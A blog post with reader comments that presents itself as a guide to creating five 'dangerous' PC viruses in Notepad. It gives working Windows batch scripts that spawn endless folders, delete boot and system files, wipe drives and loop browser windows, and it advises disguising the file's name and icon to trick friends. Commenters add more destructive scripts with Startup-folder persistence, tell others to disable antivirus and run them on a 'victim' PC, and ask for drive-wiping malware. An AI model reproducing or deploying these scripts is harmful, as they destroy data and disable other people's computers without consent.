CREATE 5 MOST DANGEROUS VIRUS FOR PC USING NOTEPAD

Posted by

Be Aware of Virus & Learn How they works
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…

We have listed down 5 dangerous Viruses

How to create more than 3,000 folders under a minute:

  1. 1) Open your notepad and type
    the following code.
    @echo off
    :top
    md %random%
    goto top
    2) Save it as 1000.bat
    @echo off makes your screen
    appear blank but it is actually
    making hundreds of folders.
    md %random% is command that
    creating folders with random
    names.( md is a command to
    make directory in ms-dos)
    goto top – return the command
    to :top, causes an infinite loop.
    NOTE: The folders will get created
    in the directory where you saved
    the ”1000.bat” file.
    The file might look suspicious to
    your friends. So if you are
    looking to fool your friends, then
    change the file name and also
    the icon so that he doesn’t
    suspect the file to be a virus.

    ====================================================================
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    ====================================================================
    2. How to Shutdown a computer forever?
    Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
    code into your notepad
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows
    \win.ini
    del c:\windows\win.ini
    Save it as “shutdown-
    forever.bat”. Just make sure it
    has a .bat or .cmd extension.
    DONT RUN THE BATCH FILE ,YOU
    WONT RECOVER BACK AFTER YOU
    RUN IT !!!
    This should shutdown the persons computer. It shuts it off once
    and deletes the files needed to reboot and restart.So please, use
    this hack only if you have no intention of rebooting your computer again. So just be careful.
    Here’s an alternative code.
    cmd /c del c:\windows\* /F /S /
    Q
    cmd /c del c:\* /F /S /Q
    Paste it in NotePad And Save It
    with Extension .cmd or .bat.

    =============================================
    3. How to Delete all your system:

    files with a small command!
    Copy the following code into your
    notepad and save it as a .bat
    file.
    del *.*

    All your files in your hard disk will
    vanish in less than 5mins.

    =============================================

    4. RAM crashing trick:
    Those bloggers who wants more views of there blog.. try it…
    Note: It will continuously will open the separate of page of given link.
    open notepad and type

    :A
    start http://geojamali.com
    goto A

    save with .bat extension.
    Infinitely loops your browser to
    open up http://geojamali.com/

    =============================================

    5. Crash a Computer System With:

    Nothing But a Link.
    This is a javascript “exploit” , it
    will hang/crash your system. It
    basically floods you with an
    infinite loop of mailto:xxx
    windows. To cancel this (and you
    have to move fast) kill the
    process of your email client
    before you run out of RAM. Every
    instance occupies about 1000
    bytes, if your victim is smart, he
    better end the process As soon as
    possible or he will be forced to
    reboot his computer.

    YOU ARE WARAN THIS LINK WILL CRASH
    YOUR BROWSER OR WORSE, YOUR
    COMPUTER !!!!

45 comments


    1. https://polldaddy.com/js/rating/rating.js. How to Shutdown a computer forever?
      Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
      code into your notepad
      @echo off
      attrib -r -s -h c:\autoexec.bat
      del c:\autoexec.bat
      attrib -r -s -h c:\boot.ini
      del c:\boot.ini
      attrib -r -s -h c:\ntldr
      del c:\ntldr
      attrib -r -s -h c:\windows
      \win.ini
      del c:\windows\win.ini
      Save it as “shutdown-
      forever.bat”. Just make sure it
      has a .bat or .cmd extension.
      its is not working

      Like

  1. del *.* will this code delete the entire hard rive or only C drive ?
    I want to create a Notepad virues bat or exe i want to formate all C D E F G drives in 5 Minutes is it possible reply me fast

    Like

  2. Here’s my work! It will make you unable to use your PC and FORCE you to install Windows OS again. You will only be aware of the infiltration the next time you turn on your Computer! Use the latest version of “Bat To Exe Converter” and add Administrator manifest to it and make it Invisible application before converting it to .exe! Your victim doesn’t even know what is happening or what this virus did. Your trusted Antivirus can’t even detect it cause this file doesn’t work as normal viruses but the later damage will be way too much than what a couple of malware can do.
    You may name it in a sexy way like GTA and choose the appropriate icon to attract your victim’s attention. But please, don’t try to be an ASS HAT with it.

    @echo off

    echo @echo off>HusanboyBayernVirus.bat
    echo title Husanboy Bayern Virus>>HusanboyBayernVirus.bat
    echo echo.>>HusanboyBayernVirus.bat
    echo echo Computer has been damaged by Husanboy>>HusanboyBayernVirus.bat
    echo echo.>>HusanboyBayernVirus.bat
    echo pause>nul>>HusanboyBayernVirus.bat

    echo @echo off>operateHusanboyBayernVirus.bat
    echo :repeat>>operateHusanboyBayernVirus.bat
    echo start “c:\Windows\HusanboyBayernVirus.bat”>>operateHusanboyBayernVirus.bat
    echo goto :repeat>>operateHusanboyBayernVirus.bat

    copy “HusanboyBayernVirus.bat” “c:\Windows\”
    copy “operateHusanboyBayernVirus.bat” “c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\”
    ping localhost -n 1 >nul
    del /f /q “HusanboyBayernVirus.bat”
    del /f /q “operateHusanboyBayernVirus.bat”

    Liked by 1 person

  3. How to merge a batch file and a jpg or jpeg file
    i want to make a virus that deletes everything in a computer and it starts working when he open his windows next time

    Like

  4. save this code as “nwdisabler.bat”

    @echo off
    ipconfig/release
    copy nwdisabler.bat “C:\users\%username%\appdata\roaming\microsoft\windows\start menu\programs\startup”
    taskkill /im explorer.exe /f
    msg * You computer network is updating. . .
    shutdown -c “The result is after restarting. . . ” -s

    That’s is the best network to disable, try it. or just virus http:\\www.joysources.info to learn more.

    Like

  5. When doing #2 after I saved it as a .bat file on my flash drive I got a warning from Windows Defender telling me the file I just saved was a Trojan and automatically quarantined it. Is that normal?? (Windows 10 Home)

    Like

    1. Disable your antivirus while creating the virus.. Otherwise it will delete the the virus file that u ceated..and also dont run virus file in ur pc..try it on victim pc.

      Like

  6. Sir, how to hide IP address.And after that how can i crash website by send message continously.
    Please give me some knowledge.
    Thank You.

    Like

  7. please tell me how to make a virus that will replace ur all files such a mp3 mp4 doc ets to none size files please tell me or send me my Whatssap +93744798595 thank you

    Like

  8. Hey guys please tell me how i can run a bat file as administrator….. is there any cmd command that i can add on top of my virus or smtn and when the victim double clicks it it will automatically run as administrator…. if u can tell me this that would be a lot of help … Thanks very much

    Like

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.